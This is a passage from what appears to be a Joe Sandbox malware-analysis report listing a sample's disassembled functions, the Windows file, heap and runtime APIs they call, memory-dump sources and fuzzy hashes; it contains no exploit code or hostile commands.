Instruction ID: 81e8f1d2776f812966a92994aa5066971be7435dd1d534bea85d910cf13060bd
Opcode Fuzzy Hash: c8a4a27e47251ba2ea891bf4c93abdb2dba2ca09b0f51f1648cd8080eabf8d4e
Instruction Fuzzy Hash: AAE0553075522C7B9A16BFA48C028AEBB60FB25B11B88015BFC15D7380DE744F00A3DA

Function 0088329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 008832AF

Strings

FlsAlloc, xrefs: 0088329E, 008832A8

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: e34ad8a3227a27ef2d2ee6440fa45727f93d0cfc5a13848210ea0f84c84e86ab
Instruction ID: 005c4fb99962741c18b4ee9c55758898a5b61818c90a9619db209e92ebb2dfee
Opcode Fuzzy Hash: e34ad8a3227a27ef2d2ee6440fa45727f93d0cfc5a13848210ea0f84c84e86ab
Instruction Fuzzy Hash: 25D02B227806346A991332C46C039AE7F04F701FB6F4D0152FF1CDA342E565850003C6

Function 0087E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087E20B

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Strings

3Qo, xrefs: 0087E1F9, 0087E205

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Qo
API String ID: 1269201914-1944013411
Opcode ID: 4c771aa9d6b843e3094aac50718aab1f3488d8c1b369f96ec2d4c834e71b7832
Instruction ID: 2f680ec35ffc9829d384ea6db1afe3c5858073f8741d4c3284e97c50195cb3a2
Opcode Fuzzy Hash: 4c771aa9d6b843e3094aac50718aab1f3488d8c1b369f96ec2d4c834e71b7832
Instruction Fuzzy Hash: 84B0129127E1017D320C6145BF06D3A033CF9C0B50330C01FF22ED40C59A80CC094033

Function 0088B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0088AF1B: GetOEMCP.KERNEL32(00000000,?,?,0088B1A5,?), ref: 0088AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0088B1EA,?,00000000), ref: 0088B3C4
GetCPInfo.KERNEL32(00000000,0088B1EA,?,?,?,0088B1EA,?,00000000), ref: 0088B3D7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: d612a17edc269b3d4996fd67defcfe3c1fc1be148e94c9e88ff4236b21501795
Instruction ID: 0e9d80ff173b9c9403366c33d5113f977957c743d31fe805f3e1bc32432e4b67
Opcode Fuzzy Hash: d612a17edc269b3d4996fd67defcfe3c1fc1be148e94c9e88ff4236b21501795
Instruction Fuzzy Hash: 775156B0A0020A9EEB24FF75C8826BABBE5FF85314F18846ED086CB253D735D545CB85

Function 00861385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00861385

Part of subcall function 00866057: __EH_prolog.LIBCMT ref: 0086605C

Part of subcall function 0086C827: __EH_prolog.LIBCMT ref: 0086C82C
Part of subcall function 0086C827: new.LIBCMT ref: 0086C86F
Part of subcall function 0086C827: new.LIBCMT ref: 0086C893

new.LIBCMT ref: 008613FE

Part of subcall function 0086B07D: __EH_prolog.LIBCMT ref: 0086B082

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8cdc815811f34918ac7a699be1538449660935762d721e8d43d1ad95a1adcd13
Instruction ID: 3cb14d8b496e4290a3636a4939c48cbb12118f65e482ffe43924ad73bb9897ba
Opcode Fuzzy Hash: 8cdc815811f34918ac7a699be1538449660935762d721e8d43d1ad95a1adcd13
Instruction Fuzzy Hash: 5C4117B0805B409ED724DF7984899E6FAE5FB18300F54496ED6EEC3282DB326554CB16

Function 00861380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00861385

Part of subcall function 00866057: __EH_prolog.LIBCMT ref: 0086605C

Part of subcall function 0086C827: __EH_prolog.LIBCMT ref: 0086C82C
Part of subcall function 0086C827: new.LIBCMT ref: 0086C86F
Part of subcall function 0086C827: new.LIBCMT ref: 0086C893

new.LIBCMT ref: 008613FE

Part of subcall function 0086B07D: __EH_prolog.LIBCMT ref: 0086B082

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 30576848de70e8f737e137b0f96be58ac2188a3b2a807add74de2921c1d00476
Instruction ID: 46897b5bb8cbae64aeb225051c6a7808e37a72ace81b5e95fbd07cd01f82f77c
Opcode Fuzzy Hash: 30576848de70e8f737e137b0f96be58ac2188a3b2a807add74de2921c1d00476
Instruction Fuzzy Hash: A44106B0805B409ED724DF7984899E7FAE5FF18300F544A6ED2EEC3282DB326554CB16

Function 0088B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00888FA5: GetLastError.KERNEL32(?,008A0EE8,00883E14,008A0EE8,?,?,00883713,00000050,?,008A0EE8,00000200), ref: 00888FA9
Part of subcall function 00888FA5: _free.LIBCMT ref: 00888FDC
Part of subcall function 00888FA5: SetLastError.KERNEL32(00000000,?,008A0EE8,00000200), ref: 0088901D
Part of subcall function 00888FA5: _abort.LIBCMT ref: 00889023

Part of subcall function 0088B2AE: _abort.LIBCMT ref: 0088B2E0
Part of subcall function 0088B2AE: _free.LIBCMT ref: 0088B314

Part of subcall function 0088AF1B: GetOEMCP.KERNEL32(00000000,?,?,0088B1A5,?), ref: 0088AF46

_free.LIBCMT ref: 0088B200
_free.LIBCMT ref: 0088B236

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 7d5b456c89b784c98b8c5c34a9d1274a24ba79ced41c9086f35c6050825b28e3
Instruction ID: ab5a8a3342d86bbe2e6d3b7a54b6746842b5ac606f14f5682b6f1563932c7b2f
Opcode Fuzzy Hash: 7d5b456c89b784c98b8c5c34a9d1274a24ba79ced41c9086f35c6050825b28e3
Instruction Fuzzy Hash: A031E231900208EFDB10FFADC845AADBBE5FF85320F25409AE414DB2A1EB719D41CB41

Function 0086971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00869EDC,?,?,00867867), ref: 008697A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00869EDC,?,?,00867867), ref: 008697DB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a74916a7c42013ea4fab4165b8d7de7f42e50529ae91fc44dff00f86c3e46e4d
Instruction ID: cabfb02b50ea24f963e3cea9974025c868d5d19a0aabba1ec5455f40351c287f
Opcode Fuzzy Hash: a74916a7c42013ea4fab4165b8d7de7f42e50529ae91fc44dff00f86c3e46e4d
Instruction Fuzzy Hash: C02101B0000748AEE7308F64C885BA7B7ECFB49768F01492DF1E6C21D2C374AC899B21

Function 00869D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00867547,?,?,?,?), ref: 00869D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00869E2C

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 7f1fa490ed23c6e28c4bf60f5caf50b730bec19f305a9537913b4232966e04d2
Instruction ID: 670802f4ae4e5b0fdfb1497a847e5293f3a80ea2c9a2c7b0e21cf2f67935e4d3
Opcode Fuzzy Hash: 7f1fa490ed23c6e28c4bf60f5caf50b730bec19f305a9537913b4232966e04d2
Instruction Fuzzy Hash: AD21D631148246ABC714DE24C451AABBBECFF55708F09482DF4C1C7181D739DA0CDB51

Function 0088A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00893958), ref: 0088A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0088A4C5

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 4669000044cce5d80730c2143875c4aba397079c534bd6a1a01bef8cd38314ac
Instruction ID: 9408f28fad6fd7eb6a6c05627d3c60a87af315e635df0a63aa739c81f80758d6
Opcode Fuzzy Hash: 4669000044cce5d80730c2143875c4aba397079c534bd6a1a01bef8cd38314ac
Instruction Fuzzy Hash: 7B113A336001245BBF2AFE2CEC4486A7391FB8072471A4122FD15EB284EA70DC41C7D6

Function 00869B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00869B35,?,?,00000000,?,?,00868D9C,?), ref: 00869BC0
GetLastError.KERNEL32 ref: 00869BCD

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: df4eef9524a1a84cd194808659386bb8891d1d4fba95097fcbdbc87cae7faf14
Instruction ID: c1848c14be067f28e69853336a745a440d83c4b5da19bdd390fce4567745059a
Opcode Fuzzy Hash: df4eef9524a1a84cd194808659386bb8891d1d4fba95097fcbdbc87cae7faf14
Instruction Fuzzy Hash: C401C4313042299B8B08DF69BC9497EB39DFFC5731B16452EF996C72D0CA31D8099B21

Function 00869E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00869E76
GetLastError.KERNEL32 ref: 00869E82

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5e4dc245b2fc1f817c861463f1f904e2d111f802c1adf5263bf9c9257b884e16
Instruction ID: fdbab6798e56685a93829cb2cf5e227e39bc27a667407d06dcd0329b194fb7d8
Opcode Fuzzy Hash: 5e4dc245b2fc1f817c861463f1f904e2d111f802c1adf5263bf9c9257b884e16
Instruction Fuzzy Hash: 4C018C753046045BEB349A699844B6BB6DDFB88328F16493EF186C26C0DAB2E8488711

Function 00888606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00888627

Part of subcall function 00888518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0088C13D,00000000,?,008867E2,?,00000008,?,008889AD,?,?,?), ref: 0088854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,008A0F50,0086CE57,?,?,?,?,?,?), ref: 00888663

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 1441ef53d357f070f72273332948c4031fbfce225ccbd761734454869a4b041e
Instruction ID: 4822d4c7d401fb166e9618282ba0e3baeabdbd3033cd97d32a4a7e04267a026d
Opcode Fuzzy Hash: 1441ef53d357f070f72273332948c4031fbfce225ccbd761734454869a4b041e
Instruction Fuzzy Hash: BCF06232145116E6DB21BA69AC08E6B7768FFB27B4FA44116F814D6191FF30CC0157A6

Function 00870908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00870915
GetProcessAffinityMask.KERNEL32(00000000), ref: 0087091C

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 9edff09976a7cacbf5226e368d92790307e05c62b7d15e693b377abd5bf7de7d
Instruction ID: cd83b85ebda42bb273441f36583d1badd6c1c72fb389863b1d2062cc614b3991
Opcode Fuzzy Hash: 9edff09976a7cacbf5226e368d92790307e05c62b7d15e693b377abd5bf7de7d
Instruction Fuzzy Hash: A7E09B36A10109FB6F05DAB49C046BBBB9DFB44214714817ABA0FD7105F570DD018E60

Function 0086A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0086A27A,?,?,?,0086A113,?,00000001,00000000,?,?), ref: 0086A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0086A27A,?,?,?,0086A113,?,00000001,00000000,?,?), ref: 0086A489

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 59a4029ffd929b6ea7f52f3b3a43ad2c89089b196412337274954ff3f6ab296a
Instruction ID: e64528150d13941d68ff0f71f3ca830c98c1e15feb66e8c9b6fc76782e1c85c5
Opcode Fuzzy Hash: 59a4029ffd929b6ea7f52f3b3a43ad2c89089b196412337274954ff3f6ab296a
Instruction Fuzzy Hash: A0F0303124020D7BDF116F65DC45FD9776CFB04385F488051BC88E6161DB76DEA8AE51

Function 0087D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0087D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 0087D5B8

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 306ad7f86730d7c276a80a60fe01ad2e7b30f987f8d8c8201e9530347705d560
Instruction ID: 06eb201906c7502c44d4cc911d4bb184a7cfd1c538a328cdd70849388c5d4634
Opcode Fuzzy Hash: 306ad7f86730d7c276a80a60fe01ad2e7b30f987f8d8c8201e9530347705d560
Instruction Fuzzy Hash: D1F0EC7190034C7BEB11AB749C06F9D376CFB09745F044595B604D70A2D971AE604763

Function 0086A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,0086984C,?,?,00869688,?,?,?,?,00891FA1,000000FF), ref: 0086A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0086984C,?,?,00869688,?,?,?,?,00891FA1,000000FF), ref: 0086A16C

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 511c737ad090f5e76e61e0599944213eb59fc47633787f061ca7cdaa58ee90d8
Instruction ID: 894fb0ed0d0064a7044ff431bdc753abc232217f8e92daf6c8e70e4a671bf26c
Opcode Fuzzy Hash: 511c737ad090f5e76e61e0599944213eb59fc47633787f061ca7cdaa58ee90d8
Instruction Fuzzy Hash: 51E092356402086BDB11AF64DC42FE9775CFB09381F484066B989E7160DB61DDD4AE91

Function 0087A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00891FA1,000000FF), ref: 0087A3D1
CoUninitialize.COMBASE(?,?,?,?,00891FA1,000000FF), ref: 0087A3D6

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 78750e57d6d8de57b4042bd038738e464e7ff9a9ba74daddcb5d7f027ba98fa8
Instruction ID: 58578e5f972f69aa09c3849a6b6202997b6c1b369f52d60ffe51b225841720c7
Opcode Fuzzy Hash: 78750e57d6d8de57b4042bd038738e464e7ff9a9ba74daddcb5d7f027ba98fa8
Instruction Fuzzy Hash: 6DF03032518655DFC710AB4CDC05B15FBA8FB49B20F04436AF419C3B60CF746800CA91

Function 0086A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

